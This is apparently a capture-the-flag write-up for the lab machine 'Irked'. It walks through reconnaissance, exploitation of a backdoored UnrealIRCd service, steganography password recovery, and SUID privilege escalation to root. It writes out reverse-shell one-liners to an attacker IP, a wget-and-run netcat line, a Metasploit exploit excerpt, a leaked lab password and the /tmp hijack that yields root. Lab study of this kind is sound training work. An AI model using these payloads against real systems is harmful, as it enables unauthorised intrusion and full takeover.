✅Irked (Easy)

Lesson Learn

Report-Penetration

Vulnerable Exploit: Command Execution

System Vulnerable: 10.10.10.117

Vulnerability Explanation: The machine is vulnerable to Command execution which could allow us inject reverse shell and gain initial foothold on the machine.

Privilege Escalation Vulnerability: Misconfigure of SETUID.

Vulnerability Fix: Apply patch or upgrade the system.

Severity: High

Step to Compromise the Host:

Reconnaissance

└─$ nmap -sC -sV -T4 -p- 10.10.10.117 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-14 01:29 EST
Nmap scan report for 10.10.10.117
Host is up (0.043s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33073/udp   status
|   100024  1          41173/udp6  status
|   100024  1          46099/tcp   status
|_  100024  1          47374/tcp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
46099/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Port 80 Apache/2.4.10

First I will go through port 80, there is a simple webpage and the source code nothing interest.

Let start with Gobuster to find hidden directory.

└─$ gobuster dir -u http://10.10.10.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50                 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.117
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/14 01:30:52 Starting gobuster in directory enumeration mode
===============================================================
/manual               (Status: 301) [Size: 313] [--> http://10.10.10.117/manual/]
/server-status        (Status: 403) [Size: 300]                                  
                                                                                 
===============================================================
2021/11/14 01:34:10 Finished
===============================================================

Following through /manual directory we just see a apache 2.4.

Let just skip port 22 and port 111 due to we have less chance on these ports and move on to other port.

Port 6697, 8067, 65534 (IRC UnrealIRCd)

Let check if IRC is vulnerable or not.

└─$ ls /usr/share/nmap/scripts/irc*   
/usr/share/nmap/scripts/irc-botnet-channels.nse  
/usr/share/nmap/scripts/irc-info.nse        
/usr/share/nmap/scripts/irc-unrealircd-backdoor.nse
/usr/share/nmap/scripts/irc-brute.nse            
/usr/share/nmap/scripts/irc-sasl-brute.nse

We found it's vulnerable on service port 8067.

└─$ nmap -p6697,8067,65534 --script irc-unrealircd-backdoor 10.10.10.117
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-14 01:54 EST
Nmap scan report for 10.10.10.117
Host is up (0.043s latency).

PORT      STATE SERVICE
6697/tcp  open  ircs-u
8067/tcp  open  infi-async
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
65534/tcp open  unknown

Exploitation

#1 Namp (8067)

Checking on the nmap script, we found that it's executed arbitrary command.

<code>
  $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' <target>
  $ ncat -vv localhost 4444
  Ncat: Version 5.30BETA1 ( https://nmap.org/ncat )
  Ncat: Connected to 127.0.0.1:4444.
  pwd
  /home/ron/downloads/Unreal3.2-bad
  whoami
  ron
</code>

Let start our netcat listener on port 4444.

nc -lvp 4444

Then, execute the command reverse shell to our machine.

└─$ nmap -p8067 --script irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.14.31 4444" 10.10.10.117 

#2 Manual (6697)

Let search for public exploit of search UnrealIRCd.

└─$ searchsploit unrealircd
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                                                                                                | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                                                                                     | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                                                                                              | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                                                                                                   | windows/dos/27407.pl
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

Let examine on UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)

	def exploit
		connect

		print_status("Connected to #{rhost}:#{rport}...")
		banner = sock.get_once(-1, 30)
		banner.to_s.split("\n").each do |line|
			print_line("    #{line}")
		end

		print_status("Sending backdoor command...")
		sock.put("AB;" + payload.encoded + "\n")

		handler
		disconnect
	end

Start netcat listener on port 4444.

nc -lvp 4444

Let connect to the port 6697 via netcat and execute netcat reverse shell.

└─$ nc 10.10.10.117 6697 -v                                                                                                                   
10.10.10.117: inverse host lookup failed: Unknown host
(UNKNOWN) [10.10.10.117] 6697 (ircs-u) open
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.31 4444 > /tmp/f

Privilege Escalation

Shell as djmardov

As we are under user ircd, we don't have permission to read the flag under user djmardov.

ircd@irked:/home/djmardov/Documents$ ls
user.txt
ircd@irked:/home/djmardov/Documents$ cat user.txt 
cat: user.txt: Permission denied

Listing the files on directory Document, we found file .backup which contain interesting text.

ircd@irked:/home/djmardov/Documents$ ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

ircd@irked:/home/djmardov/Documents$ cat .backup 
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

Let start install tool Steghide is steganography program which hides bits of a data file in some of the least significant bits of another file in such a way that the existence of the data file is not visible and cannot be proven.

sudo apt install steghide

Let download the image file on the webpage that we found. Then, extract the hidden password in the image with the password in backup file.

wget http://10.10.10.117/irked.jpg

└─$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".

└─$ cat pass.txt     
Kab6h+m+bbp2J:HG

Let try to ssh with user djmardov and password we just extracted. We're now in djmardov permission and we can read the user flag.

└─$ ssh djmardov@10.10.10.117                                                                                                                                                           130 ⨯
djmardov@10.10.10.117's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ whoami
djmardov
djmardov@irked:~$ id
uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
djmardov@irked:~$ 
djmardov@irked:~$ cat /home/djmardov/Documents/user.txt
4a66a7......................

Shell as root

SUID viewuser

Now, let check for misconfigured on SetUID. Interesting one is /usr/bin/viewuser.

djmardov@irked:~$ find / -type f -perm -4000 -ls 2>/dev/null
404330  356 -rwsr-xr--   1 root     messagebus   362672 Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
394848   12 -rwsr-xr-x   1 root     root         9468 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
412270   16 -rwsr-xr-x   1 root     root        13816 Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
410047  552 -rwsr-xr-x   1 root     root       562536 Nov 19  2017 /usr/lib/openssh/ssh-keysign
408970   16 -rwsr-xr-x   1 root     root        13564 Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
409724 1060 -rwsr-xr-x   1 root     root      1085300 Feb 10  2018 /usr/sbin/exim4
424276  332 -rwsr-xr--   1 root     dip        338948 Apr 14  2015 /usr/sbin/pppd
394369   44 -rwsr-xr-x   1 root     root        43576 May 17  2017 /usr/bin/chsh
410065   96 -rwsr-sr-x   1 root     mail        96192 Nov 18  2017 /usr/bin/procmail
394371   80 -rwsr-xr-x   1 root     root        78072 May 17  2017 /usr/bin/gpasswd
393000   40 -rwsr-xr-x   1 root     root        38740 May 17  2017 /usr/bin/newgrp
409644   52 -rwsr-sr-x   1 daemon   daemon      50644 Sep 30  2014 /usr/bin/at
412272   20 -rwsr-xr-x   1 root     root        18072 Sep  8  2016 /usr/bin/pkexec
424835   12 -rwsr-sr-x   1 root     root         9468 Apr  1  2014 /usr/bin/X
394373   52 -rwsr-xr-x   1 root     root        53112 May 17  2017 /usr/bin/passwd
394368   52 -rwsr-xr-x   1 root     root        52344 May 17  2017 /usr/bin/chfn
1062682    8 -rwsr-xr-x   1 root     root         7328 May 16  2018 /usr/bin/viewuser
914060   96 -rwsr-xr-x   1 root     root        96760 Aug 13  2014 /sbin/mount.nfs
783487   40 -rwsr-xr-x   1 root     root        38868 May 17  2017 /bin/su
783401   36 -rwsr-xr-x   1 root     root        34684 Mar 29  2015 /bin/mount
792821   36 -rwsr-xr-x   1 root     root        34208 Jan 21  2016 /bin/fusermount
792836  160 -rwsr-xr-x   1 root     root       161584 Jan 28  2017 /bin/ntfs-3g
783402   28 -rwsr-xr-x   1 root     root        26344 Mar 29  2015 /bin/umount

Let try to execute the /usr/bin/viewuser, and it shows error /tmp/listusers not found.

djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-11-14 01:28 (:0)
djmardov pts/1        2021-11-14 02:27 (10.10.14.31)
sh: 1: /tmp/listusers: not found

Let create create file name listusers in /tmp directory with bash command. Then, give executed permission to the file. Once, we executed, we are now root.

djmardov@irked:~$ echo "bash" > /tmp/listusers; chmod +x /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-11-14 01:28 (:0)
djmardov pts/1        2021-11-14 02:27 (10.10.14.31)
root@irked:~# whoami
root
root@irked:~# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
root@irked:~#